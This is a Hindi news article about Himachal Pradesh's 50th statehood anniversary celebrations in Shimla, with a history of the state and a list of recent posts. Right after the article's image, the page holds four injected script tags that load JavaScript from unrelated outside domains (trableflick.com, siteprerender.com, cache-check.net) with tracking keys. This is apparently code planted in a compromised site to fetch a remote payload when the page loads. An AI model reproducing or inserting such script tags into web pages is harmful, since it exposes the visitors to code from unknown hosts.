हिमाचल के स्वर्ण जयंती समारोह में 25 जनवरी को शिमला आएंगे गृह मंत्री अमित शाह और BJP प्रदेशाध्यक्ष जेपी नड्डा

<p>पहाड़ी प्रदेश हिमाचल अपनी स्थापना के 50 वर्ष पूरे करने जा रहा है। हिमाचल तब व हिमाचल अब पर वर्षभर समारोह आयोजित किए जाएंगे। 25 जनवरी 1971 को हिमाचल प्रदेश को 30 छोटी बड़ी रियासतों को मिलाकर पूर्ण राज्यत्व का दर्जा प्राप्त हुआ था। हिमाचल 50 साल के इस सफ़र को स्वर्ण जयंती के रूप में मनाने जा रहा है। जिसके लिए शिमला में तैयरियां युद्ध स्तर पर चल रही है। ऐतिहासिक रिज मैदान को दुल्हन की तरह सजाया जा रहा है। इस समारोह में गृह मंत्री अमित शाह व राष्ट्रीय अध्यक्ष जेपी नड्डा सहित सांसद शिरकत करेंगे। हिमाचल स्वर्ण जयंती समारोह के तहत साल भर 51 बड़े कार्यक्रम आयोजित किए जाएंगे ताकि वर्तमान पीढ़ी को हिमाचल की विकास गाथा के बारे में जानकारी मिल सके।</p>

<p>रिज मैदान में हिमाचल स्वर्ण जयंती समारोह पर मुख्यमंत्री जय राम ठाकुर ने कहा कि हिमाचल अपने सफ़र के 50 वर्ष पूरे करने जा रहा है। इस शुभ अवसर पर केंद्रीय गृह मंत्री अमित शाह और भाजपा राष्ट्रीय अध्यक्ष के आने का कार्यक्रम है।&nbsp; स्वर्णिम रथ यात्रा ग्रामीण स्तर तक जाएगी। नए चुने हुए पंचायत प्रतिनिधियों और निगम के चुने हुए प्रतिनिधियों को भी इस कार्यक्रम से जोड़ा जाएगा। प्रशिक्षण में हिमाचल के बारे उनको जानकारी दी जाएगी। नई पीढ़ी को हिमाचल के बारे में जानकारी देने के लिए शिक्षण संस्थानों में प्रतियोगिताएं आयोजित करवाई जाएगी। जिन लोगों ने हिमाचल के लिए अलग से काम किया है उनको सम्मानित किया जाएगा। मेलों में खासकर अंतराष्ट्रीय मेलों में एक दिन हिमाचल तब और हिमाचल अब पर कार्यक्रम होंगे। हिमाचल के लोकसभा, राज्यसभा से लेकर विधायक रहे लोगों को भी सम्मानित किया जाएगा।</p>

<p>18 दिसंबर 1970 को हिमाचल प्रदेश एक्ट पास किया गया। 25 जनवरी 1971 को हिमाचल को पूर्ण राज्य का दर्जा मिला। 25 जनवरी 1971, यह वही दिन था जब हिमाचल को पूर्ण राज्य के रूप में एक अलग पहचान मिली थी। इसी दिन के दिन हिमाचल देश का 18वां राज्य बना था। जिसकी घोषणा तत्कालीन प्रधानमंत्री स्व इंदिरा गांधी ने इसी रिज मैदान से की थी। डॉ यशवंत सिंह परमार प्रदेश के पहले मुख्यमंत्री रहे। उसके बाद राम लाल ठाकुर प्रदेश के मुख्यमंत्री रहे, वीरभद्र सिंह 6 बार, शांता कुमार 2 बार, प्रेम कुमार धूमल 2 मर्तबा मुख्यमंत्री रहे वर्तमान में हिमाचल की कमान जयराम ठाकुर के हाथ में है।</p>

<p><img src=”/media/gallery/images/image(2122).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1611392645116″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

पुराने साथियों की घर वापसी से कांग्रेस संगठन हो रहा मजबूत

शिमला जिला के कुमारसैन वार्ड के जिला परिषद सदस्य उज्वल मेहता आज प्रदेश कांग्रेस मुख्यालय…

6 hours ago

“भाजपा कांग्रेस के घोषणा पत्र को लेकर भ्रामक प्रचार कर रही”

लोकसभा चुनाव में कांग्रेस घोषणा पत्र को लेकर जहां भाजपा बार-बार हिंदुत्व विरोधी और बहुसंख्यक…

6 hours ago

राष्ट्रपति द्रौपदी मुर्मू का आज शिमला पहुंचने पर स्वागत

राष्ट्रपति द्रौपदी मुर्मु का आज शिमला पहुंचने पर मशोबरा स्थित कल्याणी हेलीपैड पर राज्यपाल शिव…

7 hours ago

बागवान भोपाल ने तकनीक के इस्तेमाल से किसानी को बनाया मुनाफे का सौदा

वर्तमान में किसनी और बागवानी में भी आधुनिकीकरण का प्रभाव देखने को मिल रहा है.…

7 hours ago

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी

भाजपा बताए, वर्तमान सांसद किशन कपूर का टिकट क्यों काटा: धर्माणी -गद्दी नेता कपूर बीते…

9 hours ago

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध: बिंदल

कांग्रेस का घोषणापत्र में अल्पसंख्यक को बढ़ावा और हिन्दुत्व का विरोध, कांग्रेस नेता कर रहे…

10 hours ago